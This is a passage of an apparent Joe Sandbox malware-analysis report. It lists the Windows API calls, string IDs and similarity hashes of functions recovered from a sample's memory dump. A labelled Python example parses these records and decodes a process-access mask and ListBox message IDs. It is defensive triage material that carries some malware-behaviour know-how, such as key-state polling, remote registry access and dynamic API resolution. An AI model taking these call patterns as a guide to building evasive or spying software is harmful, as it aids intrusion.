                                                                          • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                          • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                          • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                          APIs
                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                          Similarity
                                                                          • API ID: Virtual
                                                                          • String ID:
                                                                          • API String ID: 4278518827-0
                                                                          • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                          • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                          • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                          • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                          APIs
                                                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                          • ExitThread.KERNEL32 ref: 004151ED
                                                                          • __freefls@4.LIBCMT ref: 00415209
                                                                          Similarity
                                                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                          • String ID:
                                                                          • API String ID: 442100245-0
                                                                          • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                          • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                          • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                          • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                          APIs
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                          • _wcslen.LIBCMT ref: 0045F94A
                                                                          • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                          • String ID: 0
                                                                          • API String ID: 621800784-4108050209
                                                                          • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                          • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                          • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                          • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • SetErrorMode.KERNEL32 ref: 004781CE
                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                          • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                          • String ID: \VH
                                                                          • API String ID: 3884216118-234962358
                                                                          • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                          • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                          • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                          • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                          • IsMenu.USER32(?), ref: 0044854D
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                          • DrawMenuBar.USER32 ref: 004485AF
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                          • String ID: 0
                                                                          • API String ID: 3076010158-4108050209
                                                                          • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                          • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                          • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                          • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                          • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$_memmove_wcslen
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 1589278365-1403004172
                                                                          • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                          • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                          • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                          • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Handle
                                                                          • String ID: nul
                                                                          • API String ID: 2519475695-2873401336
                                                                          • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                          • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                          • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                          • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Handle
                                                                          • String ID: nul
                                                                          • API String ID: 2519475695-2873401336
                                                                          • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                          • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                          • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                          • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                          APIs
                                                                          • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • _wcsncpy.LIBCMT ref: 00401C41
                                                                          • _wcscpy.LIBCMT ref: 00401C5D
                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                          • String ID: Line:
                                                                          • API String ID: 1874344091-1585850449
                                                                          • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                          • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                          • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                          • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: SysAnimate32
                                                                          • API String ID: 0-1011021900
                                                                          • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                          • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                          • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                          • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                            • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                            • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                            • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                            • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                          • GetFocus.USER32 ref: 0046157B
                                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                          • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                          • __swprintf.LIBCMT ref: 00461608
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                          • String ID: %s%d
                                                                          • API String ID: 2645982514-1110647743
                                                                          • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                          • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                          • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                          • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                          • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                          • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                          • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                          • String ID:
                                                                          • API String ID: 3488606520-0
                                                                          • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                          • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                          • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                          • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
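The records above list, for each function Joe Sandbox recovered from the process dump, the Win32 calls with whatever arguments could be resolved statically (a `?` is an unresolved value), plus the similarity hashes used to match the function against other samples. As an added example, not code from Joe Sandbox or from this report, the Python below parses two of those records copied from this page (abbreviated, with the associated-dump lines trimmed) into structured rows and decodes the numeric arguments that matter for triage: the 0x410 access mask passed to OpenProcess at 0047585B, and the 0x188, 0x18A and 0x189 message IDs passed to SendMessageW, which are the ListBox messages matching that function's `ComboBox$ListBox` string ID. The constant tables are deliberately partial, and the record layout (a record ends at its `Instruction Fuzzy Hash` line) is an assumption taken from the text above rather than a documented Joe Sandbox format.

```python
"""Parse Joe Sandbox per-function annotation records into rows and decode
selected numeric arguments. Added example, not Joe Sandbox code; SAMPLE is a
constructed input copied (abbreviated) from the report's own records."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
• SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$_memmove_wcslen
• String ID: ComboBox$ListBox
• API String ID: 1589278365-1403004172
• Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
• Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
APIs
• GetCurrentProcessId.KERNEL32(?), ref: 0047584D
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
• CloseHandle.KERNEL32(00000000), ref: 00475A4D
Memory Dump Source
• Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
• Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
• Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Part of subcall function X:" prefix, then Name.MODULE, optional (args), then ", ref: ADDR".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
# Partial Win32 constant tables (values from the SDK headers), enough for the calls above.
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
                  0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
                  0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION"}
LISTBOX_MSG = {0x0188: "LB_GETCURSEL", 0x0189: "LB_GETTEXT", 0x018A: "LB_GETTEXTLEN"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                 # address of the call site inside the dump
    subcall: str | None      # set when the line came from "Part of subcall function"


@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)   # "API ID", "String ID", hashes, ...

    def direct_calls(self) -> list[str]:
        """API names the function itself calls, in report order (subcall lines excluded)."""
        return [c.name for c in self.apis if c.subcall is None]


def parse_report(text: str) -> list[FunctionBlock]:
    """Split the text into records; a record is closed by its 'Instruction Fuzzy Hash' line."""
    blocks, cur, section = [], FunctionBlock(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            section = line
            continue
        if not line.startswith("•"):
            continue                       # blank lines and anything not a bullet
        body = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m is None:
                raise ValueError(f"unrecognised API line: {body!r}")
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), m["sub"]))
        else:
            key, _, val = body.partition(":")
            cur.fields[key.strip()] = val.strip()
            if key.strip() == "Instruction Fuzzy Hash":
                blocks.append(cur)
                cur, section = FunctionBlock(), None
    return blocks


def decode_args(call: ApiCall) -> str | None:
    """Readable form of the argument that matters for the two call types handled here."""
    if call.name == "OpenProcess" and call.args and call.args[0] != "?":
        mask = int(call.args[0], 16)
        names = [n for bit, n in PROCESS_ACCESS.items() if mask & bit]
        if leftover := mask & ~sum(PROCESS_ACCESS):
            names.append(f"0x{leftover:X}")   # bits the partial table does not name
        return " | ".join(names)
    if call.name == "SendMessageW" and len(call.args) > 1 and call.args[1] != "?":
        msg = int(call.args[1], 16)
        return LISTBOX_MSG.get(msg, f"WM_0x{msg:04X}")
    return None


if __name__ == "__main__":
    for b in parse_report(SAMPLE):
        print(b.fields.get("API ID"), "->", " > ".join(b.direct_calls()))
        for c in b.apis:
            if d := decode_args(c):
                print(f"  {c.name} @ {c.ref:08X}: {d}")
```

Run as a script it prints, for each record, the direct call sequence followed by the decoded arguments; the same `direct_calls()` list is what you would feed into a behaviour signature or compare across samples next to the `Instruction Fuzzy Hash`. The access mask decode shows why the OpenProcess at 0047585B is benign on its own: 0x410 is query plus read, with none of the write or thread-creation rights the injection signatures in this report depend on.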
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                                          • String ID:
                                                                          • API String ID: 15295421-0
                                                                          APIs
                                                                          • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                          Similarity
                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                          • String ID:
                                                                          • API String ID: 2449869053-0
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 004563A6
                                                                          • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                          • GetAsyncKeyState.USER32(?), ref: 00456400
